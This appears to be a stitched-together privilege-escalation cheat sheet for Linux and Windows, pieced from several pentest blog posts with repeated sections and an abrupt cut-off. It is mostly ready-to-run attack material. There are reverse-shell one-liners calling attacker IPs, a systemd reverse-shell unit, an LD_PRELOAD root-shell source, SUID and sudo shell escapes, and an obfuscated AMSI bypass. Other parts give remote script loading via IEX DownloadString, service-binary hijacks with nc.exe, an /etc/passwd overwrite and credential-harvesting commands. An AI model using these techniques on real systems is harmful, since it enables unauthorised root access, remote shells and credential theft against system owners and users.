/var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/ Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/ If commands are limited, you break out of the "jail" shell? python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i How are file-systems mounted? mount df -h Are there any unmounted file-systems? cat /etc/fstab What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search) # find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders find / -perm -o x -type d 2>/dev/null # world-executable folders find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders Any "problem" files? Word-writeable, "nobody" files find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files Preparation & Finding Exploit Code What development tools/languages are installed/supported? find / -name perl* find / -name python* find / -name gcc* find / -name cc How can files be uploaded? find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp http://www.vulnview.com/cve-details.php?cvename=[CVE] (Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/ http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/ Mitigations Try doing it! Setup a cron job which automates script(s) and/or 3rd party products Is the system fully patched? Kernel, operating system, all applications, their plugins and web services apt-get update && apt-get upgrade yum update Are services running with the minimum level of privileges required? For example, do you need to run MySQL as root? Scripts Can any of this be automated?! Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation. 1. Check what sudo permission the current user has, desired “NOPASSWD” sudo -l 2. Execute Nmap in interactive mode sudo nmap --interactive 3. Nmap has been run with “sudo” privileges. Run a shell inside the Nmap interactive prompt !bash or !sh whoami 1. Having sticky bit permission I get a root shell using ‘!sh’ and now ‘!bash’ so it is worthy to try different shells. ls -l /usr/local/bin/nmap 2. Accessing interactive mode we can run the shell nmap --interactive !bash whoami exit !sh whoami 1. In case that “--interactive" is not an option sudo -l sudo -u root nmap --interactive 2. We will now try playing with environmental variables TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF 3. We now are root bash whoami; date; hostname In order for the technique to work the WebDav service needs to be in running status because the WebDav doesn’t negotiate signing and therefore authentication relays from the current machine account will be allowed. Enable WebClient Service: #include #include int main() { const GUID _MS_Windows_WebClntLookupServiceTrigger_Provider = { 0x22B6D684, 0xFA63, 0x4578, { 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7 } }; REGHANDLE Handle; bool success = false; if (EventRegister(&_MS_Windows_WebClntLookupServiceTrigger_Provider, nullptr, nullptr, &Handle) == ERROR_SUCCESS) { EVENT_DESCRIPTOR desc; EventDescCreate(&desc, 1, 0, 0, 4, 0, 0, 0); success = EventWrite(Handle, &desc, 0, nullptr) == ERROR_SUCCESS; EventUnregister(Handle); } return success; } The above process can be conducted directly from Impacket by utilizing the “getST” python utility. Compare to Rubeus the tool doesn’t need to hash value of the machine account password but the plain-text. A service ticket can be requested by executing the following command: getST.py -spn cifs/hive.purple.lab purple.lab/Desktop-Pentestlab\$ -impersonate administrator The ticket will be saved as .ccache in the current working directory. Convert Ticket: The final ticket granting ticket (TGT) from Rubeus are based64 encoded. In order to be used for Kerberos authentication the ticket needs to be in .ccache format. Executing the following command will decode the ticket and write the output into a .kirbi file. echo "base64" | base64 -d > admin.kirbi Impacket contains a python utility which can convert Kerberos tickets that have the .kirbi extension to .ccache. ticketConverter.py /home/kali/admin.kirbi admin.ccache Access via Kerberos Authentication Obtaining a ticket which belongs to an administrator account means that it could be used to access the target service from an elevated point of view. Both “wmiexec” and “psexec” from Impacket support Kerberos authentication and therefore could be utilized to access the host as Administrator or SYSTEM completing the privilege escalation scenario. wmiexec.py -k -no-pass purple.lab/administrator@hive.purple.lab Executing “psexec” will create a service on the target host and it is not considered opsec safe. However it could be executed by specifying the administrator account and the target host with the “-k” and “-no-pass” flags to use Kerberos authentication. psexec.py -k -no-pass purple.lab/administrator@hive.purple.lab Let’s try to view the OS Release of the lab machine. By executing: $ lsb_release -a We can also see the Kernel Version: $ uname -a We first move to the tmp directory which we will be able to create a file, paste the exploit code and then compile it. The commands we should run are: $ cd /tmp $ touch exploit.c $ vim exploit.c Then, we should paste the exploit code inside the file, save and exit. Now, we have to compile the exploit. To do this we run: $ gcc exploit.c -o exploit And now we only have to execute the exploit file to see if our exploit works. By running: $ ./exploit The python command you can see was used to get a proper shell. The command used: $ python -c ‘import pty; pty.spawn(“/bin/bash”)’ As we can see, we can execute shell commands by typing “!” followed by the command we would like to execute. Thus, the: “!sh” command should normally pop a shell. And as nmap has the SUID flags, we should normally get a root shell. Linux Privilege Escalation with Setuid and Nmap I was specifically looking for executable files where the setuid parameter was marked and where the owner was root. This essentially means when the program is executed it is executed in the permission of the owner of the file (where the EUID, the Effective User ID is root), in this case root. We would look for these types of file with the below find command: find / -user root -perm -4000 -exec ls -la {} \; nmap --interactive nmap> !whoami !whoami root waiting to reap child : No child processes nmap> !sh !sh # id id uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot) # Most common techniques for privilege escalation in Linux environments: Method #1: Find setuids. Fortunately, Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain … Linux Privilege Escalation Methods. Windows Local Privilege Escalation. The types of Privilege Escalation attacks can be broadly categorized into: Horizontal Privilege Escalation. This escalation attack allows attackers to easily elevate their privilege to that of a Domain Admin once they compromise a regular user in the domain,”Look for any of those using find command: find / -perm -4000 -ls 2> /dev/null Most common techniques for privilege escalation in Linux environments: Method #1: Find setuids. Metasploit’s “Service Trusted Path Privilege Escalation” exploit takes advantage of unquoted service paths vulnerability outline in CVE-2005-1185, CVE=2005-2938 and CVE-2000-1128. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8 . Adapt - Customize the exploit, so it fits. Become command-line options. 0. Prepare your payload root.service [Unit] Description=roooooooooot [Service] Type=simple User=root ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1' [Install] WantedBy=multi-user.target 1. Find a files/directories that writable find / -type f -maxdepth 2 -writable or find / -type d -maxdepth 2 -writable 2. Transfter the payload(Or just write file there using vi) Init the target listening the port nc -vl 44444 > root.service Send file to traget nc -n TargetIP 44444 < root.service 3. Start listening on the 9999 nc -lvnp 9999 4. Execute the payload(assume the file is under /dev/shm) /bin/systemctl enable /dev/shm/root.service Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service /bin/systemctl start root 5. The nc listening on 9999 would give you the root Linux Privilege Escalation: Automated Tooling 1. Linpeas.sh (my go-to, fully automated) https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS 2. Linprivchecker.py (my backup) https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py 3. Linux-Exploit-Suggest-2.pl (To look for those sneaky little Kernel Exploits) https://github.com/jondonas/linux-exploit-suggester-2 Resources 1. The Holy Grail https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 2. My Second Favorite Guide https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_inux.html__ 3. GTFOBins (The most comprehensive binary privesc guide) https://gtfobins.github.io/ Permissive Root Script If a cron job is running a script as root, determine what the script is doing. If you have full permission to edit the script, you’re golden. Note: the » in the one-liner echo represents overwriting the file. Two of my favorite examples: Python One-Liner echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> test.py Bash One-Liner (If the script is a .sh) echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.10 7242 > /tmp/f" >> monitor.sh Now set up a listener on the defined port, and wait for the script to run. LD_Preload In some circumstances, you may be able to abuse certain services that run via LD_Preload. Run: sudo -l If env_keep+=LD+PRELOAD is seen: Make a C script named “shell” or whatever you want nano shell.c Compile the shell gcc -fPIC -shared -o shell.so shell.c -nostartfiles Take a look at what system services are being preloaded, for instance, if you see apache2 then you would do a sudo preload for apache2, escalating your current shell to a root level shell sudo LD_PRELOAD=/home/user/shell.so apache2 Bash SUID This one absolutely blew my mind, I used it recently. If you find a private SSH Key, and you can log in with it: Check for a Bash SUID. If you have it, you might be able to escalate during authentication! ssh -i id_rsa user@ip bash -p Linux Privilege Escalation: Quick and Dirty A quick and dirty Linux Privilege Escalation cheat sheet. I have utilized all of these privilege escalation techniques at least once. Published on Aug 10, 2020 Reading time: 4 minutes. Linux Privilege Escalation: Quick and Dirty Automated Tooling Usually, my approach is to use an automated tool in conjunction with some manual enumeration. However, you can completely accomplish the Privilege Escalation process from an automated tool paired with the right exploitation methodology. 1. Linpeas.sh (my go-to, fully automated) https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS 2. Linprivchecker.py (my backup) https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py 3. Linux-Exploit-Suggest-2.pl (To look for those sneaky little Kernel Exploits) https://github.com/jondonas/linux-exploit-suggester-2 Resources Keep in mind, that these are just some of the techniques I have used. You’ll find that some of the existing Linux Privilege escalation guides are much more comprehensive: 1. The Holy Grail https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 2. My Second Favorite Guide https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_inux.html__ 3. GTFOBins (The most comprehensive binary privesc guide) https://gtfobins.github.io/ Techniques God Mode history I know, seems crazy, the history command? Why? Well, I’ve successfully performed privilege escalation from finding hints or credentials in the user’s history. Capabilities If there’s a capability that has a setuid+ep, the command might be able to be abused Example: /usr/bin/python2.6 = capsetuid+ep For instance, I used this cheat sheet for capability exploits ref: https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ Changing WordPress Password via MySQL DB I came across a situation in which taking over the WordPress website was essentially in the privilege escalation process due to versioning. Find MySQL credentials Connect to the Localhost Database mysql -h localhost -u user -p Authenticate using the credentials you found Select the database that has the credentials table USE databasename; Change the admin password or user’s password that you have access to UPDATE wp_users SET user_pass=PASSWORD('P@ssw0rd123!') WHERE user_login='wpadmin'; KEY: wp_users is the table, SET is for the user password field in the table, and where is for the user login field within the table. Permissive Root Script If a cron job is running a script as root, determine what the script is doing. If you have full permission to edit the script, you’re golden. Note: the » in the one-liner echo represents overwriting the file. Two of my favorite examples: Python One-Liner echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> test.py Bash One-Liner (If the script is a .sh) echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.10 7242 > /tmp/f" >> monitor.sh Now set up a listener on the defined port, and wait for the script to run. LD_Preload In some circumstances, you may be able to abuse certain services that run via LD_Preload. Run: sudo -l If env_keep+=LD+PRELOAD is seen: Make a C script named “shell” or whatever you want nano shell.c Place the following code in the script: ``` \#include \#include \#include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } ``` Compile the shell gcc -fPIC -shared -o shell.so shell.c -nostartfiles Take a look at what system services are being preloaded, for instance, if you see apache2 then you would do a sudo preload for apache2, escalating your current shell to a root level shell sudo LD_PRELOAD=/home/user/shell.so apache2 Bash SUID This one absolutely blew my mind, I used it recently. If you find a private SSH Key, and you can log in with it: Check for a Bash SUID. If you have it, you might be able to escalate during authentication! ssh -i id_rsa user@ip bash -p Lua Privilege Escalation This is another one of those strange one-off scenarios. I had a script that allowed me to drop into a little command prompt and run different commands as root (but most of them would just print the word “nil”). I had no idea what was happening. After a little research, I found out that nil was Lua’s version of null (basically the error was telling me that it was attempting to use Lua commands but the commands used did not exist) and the prompt I was using was some sort of Lua Script. Jokingly, I typed the following: os.execute('/bin/sh') I was root!! Sudo Bypass I noticed the following entry [(ALL, !root) /bin/bash)] upon running: sudo -l I had root permissions to run bash, an obvious win! Attempting to run it as the root user would not work. A quick google search helped me understand that it was a Sudo Privilege Escalation bypass: sudo -u#-1 /bin/bash Tar SUID If you find a Tar SUID assigned to your current user, it’s an easy win: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh TMUX Session Running as Root I cannot express how many times this one has been overlooked. I’ve legitimately exploited 5+ systems in CTF-Like environments with this gem. If you see a TMUX session running as root, look at the path. Typically, I’ve seen the session running under /.devs/dev_sess This can be identified using: ps -aux | grep tmux If you see that, and a session is active as the root user, attempt an easy win: tmux -S /.devs/dev_sess If it works, check your privs! You might just be root. NMAP SUID Yes, another exceedingly simple win: nmap --interactive !sh Systemctl SUID Identifying this beauty represents yet another win Run each one of these commands in order: TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "id > /tmp/output" [Install] WantedBy=multi-user.target' > $TF systemctl link $TF systemctl enable --now $TF Copy SUID Noticing the ‘cp’ command with SUID assigned to your user account could allow you to overwrite the passwd file of the victim system, giving yourself root permissions: Open up a terminal in your attacking machine, create a salted password: openssl passwd -1 -salt roflroot pass123 Copy your attacking machine local passwd file to have something to edit: cp /etc/passwd /root/Exploits Host HTTP Server: python -m SimpleHTTPServer 8000 Navigate to /tmp directory on the victim host machine or somewhere you have write permissions and download the passwd file: wget http://192.168.119.221:8000/passwd Copy passwd file to /etc/passwd: cp passwd /etc/passwd Switch to your created user: su roflroot Windows Privilege Escalation – Credentials Harvesting Windows systems and applications often store clear text, encoded or hashed credentials in files, registry keys or in memory. When gaining initial access to a Windows machine and performing privilege escalation enumeration steps, often passwords can be found through these means and they can be used to further escalate privileges. Finding passwords in files: One of the first things to do is to search for files containing the “password” string as this could help in identifying hidden credentials: findstr /si password *.xml *.ini *.txt *.config 2>nul cd C:\ & findstr /SI /M “password” *.xml *.ini *.txt findstr /spin “password” *.* Check .config or other interesting file types for those strings dir /s *pass* == *cred* == *vnc* == *.config* dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini Older versions of windows, when performing unattended installations, used text files to store answers to questions that come up during the installation process, some of which contained clear text credentials: c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul Additionally, the Windows.old directory may contain sensitive files, such as registry hives, that could be storing passwords VNC Credentials VNC is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol to remotely control another computer. This protocol often stored clear-text user credentials in text files: dir c:\*vnc.ini /s /b dir c:\*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini Credentials Stored in the Registry The Windows registry often stores clear-text or encoded passwords used by various applications. Below are a few examples: reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP” reg query “HKCU\Software\ORL\WinVNC3\Password” reg query “HKCU\Software\TightVNC\Server” reg query “HKCU\Software\OpenSSH\Agent\Key” reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s Check for SAM and SYSTEM files access The Security Account Manager application is used to securely store users’ encrypted passwords using encryption. They are stored in a registry hive as a LM or NTLM hash. They can be stored in the following keys: %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system Common Web Configuration Files Web applications might store clear-text or encoded credentials in text files. The Inetpub folder is the default folder for Microsoft IIS and if present, it is likely to contain confidentials information. Some example commands are: dir /a C:\inetpub\ dir /s web.config C:\Windows\System32\inetsrv\config\applicationHost.config Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf Web Logs Apache, Tomcat and IIS have logs that are used to store user access to a web application and any errors that may have occurred in the web application. These are usually store in these locations: dir /s access.log error.log C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log Cached & Saved Credentials Windows often uses applications such as the Windows Vault to store login credentials for servers and sites. Cmdkey is a command used to create/list/delete stored user names, passwords or credentials. The below can be used to list saved credentials: cmdkey /list Once verifying that credentials are stored in the system, the runas command can be used with the /savecred flag to execute commands as another user using the saved credentials: runas /savecred /user:WORKGROUP\Administrator “\\10.10.10.10\SHARE\evil.exe” runas can also be used by providing user credentials: • C:\Windows\System32\runas.exe /env /noprofile /user: “c:\users\Public\nc.exe -nc 4444 -e cmd.exe” or • $ secpasswd = ConvertTo-SecureString “” -AsPlainText -Force • $ mycreds = New-Object System.Management.Automation.PSCredential (“”, $secpasswd) • $ computer = “” [System.Diagnostics.Process]::Start(“C:\users\public\nc.exe”,” 4444 -e cmd.exe”, $mycreds.Username, $mycreds.Password, $computer) Windows Credential Store The Windows Credential Store is a feature of Windows that saves usernames, passwords, and certificates for systems, websites, and servers. information is stored. The Credential Manager stores two types of credentials: Web and Windows. There are two PowerShell scripts that can help harvest this data:Gathering Web Credentials: https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1 Windows Credentials https://github.com/peewpw/Invoke-WCMDump/blob/master/Invoke-WCMDump.ps1 Group Policy Preferences (GPP Passwords) If the box is part of a domain and the current user user has access to read System Volume Information, this can help find passwords stored in files. Start by checking the environment variables for the IP-address of the domain controller. Output environment-variables with the following: LOGONSERVER=\\NAMEOFSERVER USERDNSDOMAIN=WHATEVER.LOCAL Then look up the IP-address nslookup nameofserver.whatever.local Mount the volume and search for the groups.xml file net use z: \\192.168.1.101\SYSVOL z: dir Groups.xml /s Otherwise, these can be found in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history, by looking for: Groups.xml Services.xml Scheduledtasks.xml DataSources.xml Printers.xml Drives.xml The next step is decrypt the passowrds using the gpp-decrypt tool. You can also do this with PowerView and the Get-GPPPpassword script. Using Powershell to load them into memory: IEX(New-Object Net.WebClient).DownloadString(“http://10.0.0.100/Get-GPPPassword.ps1″) IEX(New-Object Net.WebClient).DownloadString(“http://10.0.0.100/powerview.ps1″) Then run the Get-GPPPassword tool and feed any listed passwords to PowerView. This will check any found credentials against other machines. Get-NetOU -GUID “{4C86DD57-4040-41CD-B163-58F208A26623}” | %{ Get-NetComputer -ADSPath $_ } Visit https://www.toshellandback.com/2015/08/30/gpp/ for more info. Services and Applications Storing Credentials Applications that are used to access systems or services remotely such as Remmina/PuTTY, RDP, Filezilla etc often store passwords in memory or in files. These can be retrieved using SessionGopher: https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -AllDomain -o Invoke-SessionGopher -AllDomain -u domain.com\stef -p password Lazagne can also be used to exctract credentials from many applications. Credentials Stored in Browsers Browsers such as Google Chrome, Firefox, Microsoft Edge etc. can often store passwords when authentication to a website is performed. Lazagne is an open source application used to retrieve passwords stored on a local computer, and one of its many functions is to retrieve passwords stored in internet browsers. Command Description laZagne.exe all Launch all modules laZagne.exe browsers Launch only a specific module laZagne.exe browsers -firefox Launch a specific software script laZagne.exe -h laZagne.exe browsers -h Get help laZagne.exe all -vv Change verbosity mode (2 different levels) Additionally, the following Metasploit modules can also be used: use post/window/gather/enum_chrome use post/window/gather/enum_firefox use post/window/gather/enum_ie Saved RDP Connections RDP has the ability to save connection information (such as passwords) in the registry. They can be found at the following registry keys: HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\ HKCU\Software\Microsoft\Terminal Server Client\Servers\ Powershell Command History Commands executed using powershell are stored in a history file (similar to the .bash_history file in linux), if clear-text credentials were entered when issuing a command, this could be exploited by accessing the history file: type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw Wi-Fi Credentials Command Description netsh wlan show profile List available AP SSID netsh wlan show profile key=clear Get the clear-text password use cls & echo. & for /f “tokens=4 delims=: ” %a in (‘netsh wlan show profiles ^| find “Profile “‘) do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr “SSID Cipher Content” | find /v “Number” & echo.) & @echo on Additional Metasploit Modules There are certain Metasploit modules that aim at to find clear-text or encoded credentials in a target system: use post/windows/gather/credentials/gpp use post/windows/gather/credential_collector use post/window/gather/enum_chrome use post/window/gather/enum_firefox use post/window/gather/enum_ie use post/multi/gather/filezilla_client_cred use post/multi/gather/firefox_creds use post/multi/gather/irssi_creds use post/multi/gather/lastpass_creds use post/multi/gather/maven_creds use post/multi/gather/netrc_creds use post/multi/gather/pidgin_cred use post/multi/gather/rsyncd_creds use post/multi/gather/ssh_creds use post/multi/gather/thunderbird_creds Automated enumeration scripts will also perform credential harvesting although it’s always best to do this manually. credentialsguideHackingpasswordPenetration TestingPentestingpowershellPrivilege EscalationWindows There is one more shortcut which you can use when you have access to vim, you can use the following command to trigger the root shell using vim. sudo vi -c '!bash' Vim is a very versatile text editor which have many awesome functionalities including the ability to open a shell inside it. So, to open vim as root we can use the following command. sudo vi test.sh As soon as you will execute it, vi window will open, now you need to switch into the command mode you can do that by pressing ESC key. In command mode, use :!bash command this will open a root shell. There is one more shortcut which you can use when you have access to vim, you can use the following command to trigger the root shell using vim. sudo vi -c '!bash' Domain Enumeration: Enumerate Domain: − Users − Computers − Domain Administrators − Enterprise Administrators − Shares Script Bypass: powershell -ep bypass Bypass amsi: sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" - f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."getfiElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sETVaLUE"( ${nULl},${tRuE} ) Powerview: . .\PowerView.ps1 Get-NetUser List property of all users, Get-NetUser | select -ExpandProperty samaccountname Enumerate member computers Get-NetComputer Attributes of Domain Admin Group Get-NetGroup -GroupName "Domain Admins" -FullData Enumerate members of Domain Admin Group: Get-NetGroupMember -GroupName "Domain Admins" Enumerate members of Enterprise Group: Get-NetGroupMember -GroupName "Enterprise Admins" Get-NetGroupMember -GroupName "Enterprise Admins" –Domain xxxx.local Find Interesting Shares: Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC –Verbose ENUMERATING GPO & ENUMERATE RESTRICTED GROUPS from GPO: Get-NetGPOGroup -Verbose Look for memberships of the Group "RDPUsers" Get-NetGroupMember -GroupName RDPUsers List all the OUs: Get-NetOU List all computers in specific OU: Get-NetOU LockedMachines | %{Get-NetComputer -ADSPath $_} List GPOs: Get-NetGPO Enumerate GPO applied in specific OU: Get-NetOU LockedMachines -FullData).gplink [LDAP://cn={3E04167E-C2B6-4A9A8FC811158DC97C},cn=policies,cn=system,DC=lockedcorp,DC=lockedcorp ,DC=local;0] Get-NetGPO -ADSpath 'LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=lockedcorp,DC=lockedcorp,DC=local' ENUMERATING ACLS Enumerate ACLs with Powerview Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs -Verbose Enumerate ACLs of Domain Admin Group Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs - Verbose Enumerate ACLs for all GPOs: Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} Enumerate GPO for user or RDPUser group Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $.Name} ?{$.IdentityReference -match "user"} Check for modify rights/persmissions Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference - match "student"} Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference - match "RDPUsers"} ENUMERATE TRUSTS: Enumerate ALL domains Get-NetForestDomain -Verbose Map the trusts of the domain: Get-NetDomainTrust Map all trusts to forest: Get-NetForestDomain -Verbose | Get-NetDomainTrust List only external trusts Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} Identify external trusts of domain Get-NetDomainTrust | ?{$_.TrustType -eq 'External'} If Bi-directional trust try and extract info from forest: Get-NetForestDomain -Forest lockercorp.local -Verbose | Get- NetDomainTrust # Basics systeminfo hostname # Who am I? whoami echo %username% # What users/localgroups are on the machine? net users net localgroups # More info about a specific user. Check if user has privileges. net user user1 # View Domain Groups net group /domain # View Members of Domain Group net group /domain # Firewall netsh firewall show state netsh firewall show config # Network ipconfig /all route print arp -A # How well patched is the system? wmic qfe get Caption,Description,HotFixID,InstalledOn Cleartext Passwords Search for them findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini #Find all those strings in config files. dir /s *pass* == *cred* == *vnc* == *.config* # Find all passwords in all files. findstr /spin "password" *.* findstr /spin "password" *.* In Files These are common files to find them in. They might be base64-encoded. So look out for that. c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml dir c:\*vnc.ini /s /b dir c:\*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini In Registry # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # SNMP Paramters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s Sometimes there are services that are only accessible from inside the network. netstat -ano Scheduled Tasks: Here we are looking for tasks that are run by a privileged user, and run a binary that we can overwrite. schtasks /query /fo LIST /v cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM Change the upnp service binary: sc config upnphost binpath= "C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe" sc config upnphost obj= ".\LocalSystem" password= "" sc config upnphost depend= "" Weak Service Permissions: WMCI wmic service list brief Here is a POC code for getsuid. #include int main () { int i; i = system("net localgroup administrators theusername /add"); return 0; } We then compile it with mingw like this: i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe Restart the Service: Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using wmic or net the following way: wmic service NAMEOFSERVICE call startservice net stop [service name] && net start [service name]. Migrate the meterpreter shell: If your meterpreter session dies right after you get it you need migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this: wmic process list brief | find "winlogon" So when you get the shell you can either type migrate PID or automate this so that meterpreter automatically migrates. http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html Unquoted Service Paths: Find Services With Unquoted Paths # Using WMIC wmic service get name,displayname,pathname,startmode 